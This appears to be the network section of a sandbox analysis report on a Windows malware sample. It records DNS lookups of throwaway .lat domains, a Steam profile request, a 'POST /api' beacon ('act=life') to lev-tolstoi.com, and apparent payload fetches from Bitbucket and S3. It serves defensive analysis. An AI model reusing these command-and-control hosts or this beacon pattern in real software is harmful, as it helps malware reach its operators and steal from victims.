                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.188003063 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.188031912 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.188038111 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.188081980 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.192430019 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.192468882 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.192493916 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.192532063 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.192532063 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.192540884 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.192668915 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.196780920 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.196804047 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.196866989 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.196896076 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.196902990 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.196913004 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.200970888 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.200992107 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.201095104 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.201095104 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.201102972 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.204822063 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.205517054 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.205538034 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.205585957 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.205600977 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.205607891 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.205655098 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209093094 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209114075 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209157944 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209166050 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209382057 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209382057 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209873915 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.224205971 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.373261929 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.373281002 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.373426914 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.373450994 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.373754025 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.373989105 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.377538919 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.377552986 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.377614021 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.377624035 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.382036924 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.382064104 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.382107019 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.382116079 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.382154942 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.382188082 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.396414042 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.396429062 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.396456957 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.396514893 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.396514893 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.396526098 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397531986 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397572041 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397578001 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397593975 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397603989 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397610903 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397663116 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397663116 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.853903055 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.853924036 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.853961945 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.853971958 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:19.826811075 CET5765853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:19.964447975 CET53576581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:19.969986916 CET5348353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.109761000 CET53534831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.251882076 CET5330053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.389487028 CET53533001.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.422353983 CET5653353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.566075087 CET53565331.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.575001955 CET5748753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.714078903 CET53574871.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.737541914 CET5197253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.876513958 CET53519721.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.908101082 CET6206353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.045850039 CET53620631.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.049421072 CET5950753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.187879086 CET53595071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.191726923 CET5648853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.329380035 CET53564881.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.331176996 CET5149053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.468461037 CET53514901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.917895079 CET5726153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:24.055941105 CET53572611.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:46.446219921 CET6511353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:46.584954977 CET53651131.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:48.871879101 CET6489853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:49.177618980 CET53648981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:19.826811075 CET192.168.2.51.1.1.10x5947Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:19.969986916 CET192.168.2.51.1.1.10xbb4dStandard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.251882076 CET192.168.2.51.1.1.10x2fd4Standard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.422353983 CET192.168.2.51.1.1.10x7Standard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.575001955 CET192.168.2.51.1.1.10xce2eStandard query (0)energyaffai.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.737541914 CET192.168.2.51.1.1.10x9bb2Standard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.908101082 CET192.168.2.51.1.1.10x725cStandard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.049421072 CET192.168.2.51.1.1.10xc831Standard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.191726923 CET192.168.2.51.1.1.10xf37aStandard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.331176996 CET192.168.2.51.1.1.10xf8b8Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.917895079 CET192.168.2.51.1.1.10x1ba9Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:46.446219921 CET192.168.2.51.1.1.10x1e40Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:48.871879101 CET192.168.2.51.1.1.10x344dStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:19.964447975 CET1.1.1.1192.168.2.50x5947Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.109761000 CET1.1.1.1192.168.2.50xbb4dName error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.389487028 CET1.1.1.1192.168.2.50x2fd4Name error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.566075087 CET1.1.1.1192.168.2.50x7Name error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.714078903 CET1.1.1.1192.168.2.50xce2eName error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.876513958 CET1.1.1.1192.168.2.50x9bb2Name error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.045850039 CET1.1.1.1192.168.2.50x725cName error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.187879086 CET1.1.1.1192.168.2.50xc831Name error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.329380035 CET1.1.1.1192.168.2.50xf37aName error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.468461037 CET1.1.1.1192.168.2.50xf8b8No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:24.055941105 CET1.1.1.1192.168.2.50x1ba9No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:24.055941105 CET1.1.1.1192.168.2.50x1ba9No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:46.584954977 CET1.1.1.1192.168.2.50x1e40No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:46.584954977 CET1.1.1.1192.168.2.50x1e40No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:46.584954977 CET1.1.1.1192.168.2.50x1e40No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:49.177618980 CET1.1.1.1192.168.2.50x344dNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:49.177618980 CET1.1.1.1192.168.2.50x344dNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:49.177618980 CET1.1.1.1192.168.2.50x344dNo error (0)s3-w.us-east-1.amazonaws.com3.5.16.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:49.177618980 CET1.1.1.1192.168.2.50x344dNo error (0)s3-w.us-east-1.amazonaws.com52.216.8.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:49.177618980 CET1.1.1.1192.168.2.50x344dNo error (0)s3-w.us-east-1.amazonaws.com3.5.21.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:49.177618980 CET1.1.1.1192.168.2.50x344dNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:49.177618980 CET1.1.1.1192.168.2.50x344dNo error (0)s3-w.us-east-1.amazonaws.com52.216.38.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:49.177618980 CET1.1.1.1192.168.2.50x344dNo error (0)s3-w.us-east-1.amazonaws.com3.5.30.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:49.177618980 CET1.1.1.1192.168.2.50x344dNo error (0)s3-w.us-east-1.amazonaws.com52.216.187.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:49.177618980 CET1.1.1.1192.168.2.50x344dNo error (0)s3-w.us-east-1.amazonaws.com54.231.192.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                                                                        • lev-tolstoi.com
                                                                                                                                                                                                                                                                        • bitbucket.org
                                                                                                                                                                                                                                                                        • bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.54970423.55.153.1064435600C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 06:26:22 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                                                        2024-12-23 06:26:23 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:23 GMT
                                                                                                                                                                                                                                                                        Content-Length: 35121
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: sessionid=689cfb1813aab72f39f2bc09; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                        2024-12-23 06:26:23 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                        2024-12-23 06:26:23 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                        Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                        2024-12-23 06:26:23 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                        Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        1192.168.2.549705104.21.66.864435600C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 06:26:25 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 06:26:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                                                        2024-12-23 06:26:26 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=sq97uf92e1p6mru06a7q9ld41b; expires=Fri, 18 Apr 2025 00:13:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tw1q%2BDkYDwwq8h8ogp%2Fe7qdRPRSe3txl7f7Qp2a7FJ9LSTUD57yFF3%2BU5kPMOQ1efBNZ9jlVb8QsIrkHvx1HPr8VFocKA%2FR43iZ6ZCDGxq%2FZOcEAq%2BUd%2FrbW6ZCQBj%2BmQro%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6647ada9270f6f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1490&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1907250&cwnd=209&unsent_bytes=0&cid=3347de1ad69679f1&ts=763&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 06:26:26 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                                                        2024-12-23 06:26:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        2192.168.2.549706104.21.66.864435600C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 06:26:27 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
